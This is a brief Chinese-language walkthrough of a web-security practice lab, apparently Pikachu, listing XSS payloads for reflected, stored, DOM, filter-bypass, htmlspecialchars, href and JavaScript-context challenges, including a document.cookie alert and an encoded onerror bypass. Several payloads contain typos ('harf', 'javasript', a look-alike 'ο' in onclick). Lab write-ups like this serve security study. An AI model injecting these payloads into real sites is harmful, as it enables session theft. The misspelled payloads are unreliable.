反射性xss(get)
直接输入<script>alert("xxs");</script>
存储型xss
输入<script>alert(document.cookie);</script>
dom-xss
必须构造闭合
输入' οnclick='alert('xxs')">
也可以使用'>进行闭合然后
DoM型xss-x
进行闭合
' οnclick="alert('xss')">
xss之过滤
'<%2Fp>"<img+src%3D"%23"+onerror%3D'alert("xxs")'>"<p>'
然后成功插入绕过
xss之htmlspecialchars
采用<a>进行弹窗
看出来这个a是<a>标签,那么我们就利用<a harf="javasript:alert("xxs")">来弹窗
xss之href输出
直接输入
javascript:alert(1);
直接弹出
xss之js输出
输出lili'</script><script>alert("xxs");</script>